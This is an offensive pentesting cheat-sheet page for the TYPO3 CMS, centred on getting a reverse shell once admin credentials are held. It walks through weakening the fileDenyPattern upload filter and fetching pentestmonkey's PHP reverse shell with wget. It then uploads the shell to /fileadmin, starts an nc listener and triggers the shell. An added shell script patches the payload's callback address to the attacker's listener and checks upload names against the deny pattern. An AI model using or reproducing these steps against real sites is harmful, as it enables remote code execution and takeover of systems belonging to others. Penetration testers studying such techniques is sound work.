TYPO3 Pentesting

Last modified: 2022-12-01


TYPO3 is a PHP-based web content management system. It runs on common web servers such as Apache, Nginx or IIS, and its backend login is normally served under /typo3/.

Directory Discovery


Default Credentials


Reverse Shell (Admin Credential Required)

TYPO3 refuses uploads whose names match the regular expression in $GLOBALS['TYPO3_CONF_VARS']['BE']['fileDenyPattern'], and the default pattern blocks .php and related extensions (phtml, phar and so on), including double extensions such as shell.php.txt. To check and edit it, go to “ADMIN TOOLS” → “Configure Installation-Wide Options” (under “Settings” in newer versions) → “Backend” → “fileDenyPattern”.
Update the pattern if necessary, for example by removing the “php[1-9]?” alternative so that .php names are no longer denied. Note that this is a visible, installation-wide change.


Next, prepare the reverse shell payload, saved as “shell.php”. The pentestmonkey script connects back to a placeholder address ($ip = '127.0.0.1'; $port = 1234;), so edit those two lines to point at your listener before uploading.

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php

Go to “FILE” → “Filelist” and upload the payload to the root of /fileadmin.
Now start a listener on the port you set in the payload.

nc -lvnp 4444

Then request “/fileadmin/shell.php” in the browser or with curl. The script runs and connects back, and the listener should receive the shell. If the response is the PHP source instead of a connection, the web server is not executing PHP under /fileadmin, and this path will not work.
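The checks in the procedure above, as an added shell example that is not part of the original page: whether a given fileDenyPattern would reject the upload name, and a patch of the pentestmonkey script so that it points at the listener instead of its placeholder. Assumptions: LHOST/LPORT are the attacker's listener, the deny pattern string is the one read from the backend (the value below has the shape of the TYPO3 default and must be confirmed against the target), and the script still carries its two placeholder lines.

```shell
#!/bin/sh
# Added example (not from the original page): stage a PHP reverse shell for a
# TYPO3 /fileadmin upload and verify it against the configured deny pattern.
set -e

LHOST="${LHOST:-10.10.14.5}"   # assumed listener address
LPORT="${LPORT:-4444}"         # assumed listener port

# Assumed deny pattern, shaped like the TYPO3 default; read the real value from
# ADMIN TOOLS -> Configure Installation-Wide Options -> Backend -> fileDenyPattern.
DENY_DEFAULT='\.(php[3-8]?|phpsh|phtml|pht|phar|shtml|cgi)(\..*)?$|\.pl$|^\.htaccess$'
# The same pattern after the php alternative was removed, as the text suggests.
DENY_LOOSENED='\.(phpsh|phtml|pht|phar|shtml|cgi)(\..*)?$|\.pl$|^\.htaccess$'

# upload_blocked PATTERN NAME: succeeds if TYPO3 would reject NAME.
# TYPO3 applies the pattern case-insensitively; grep -Ei covers the
# syntax used in the default pattern.
upload_blocked() {
    printf '%s\n' "$2" | grep -Eiq -- "$1"
}

# patch_shell FILE HOST PORT: replace the placeholder $ip/$port lines that
# pentestmonkey's php-reverse-shell ships with.
patch_shell() {
    sed -i.bak \
        -e 's/^[$]ip = .*/$ip = '"'$2'"';/' \
        -e 's/^[$]port = .*/$port = '"$3"';/' "$1"
    rm -f "$1.bak"
}

# shell_target FILE: print HOST:PORT the patched script will connect to,
# so it can be compared with the listener before the upload.
shell_target() {
    h=$(sed -n "s/^[$]ip = '\([^']*\)';.*/\1/p" "$1")
    p=$(sed -n 's/^[$]port = \([0-9]*\);.*/\1/p' "$1")
    printf '%s:%s\n' "$h" "$p"
}

# Usage against the real script (needs network access):
#   wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
#   patch_shell shell.php "$LHOST" "$LPORT"
#   shell_target shell.php            # must print LHOST:LPORT
#   upload_blocked "$DENY_DEFAULT" shell.php && echo "loosen fileDenyPattern first"
#   nc -lvnp "$LPORT"                 # then upload and request /fileadmin/shell.php
```

upload_blocked also shows why renaming to shell.php.txt does not help: the trailing (\..*)? in the default pattern catches double extensions, which is exactly why the text has you edit the pattern rather than the filename.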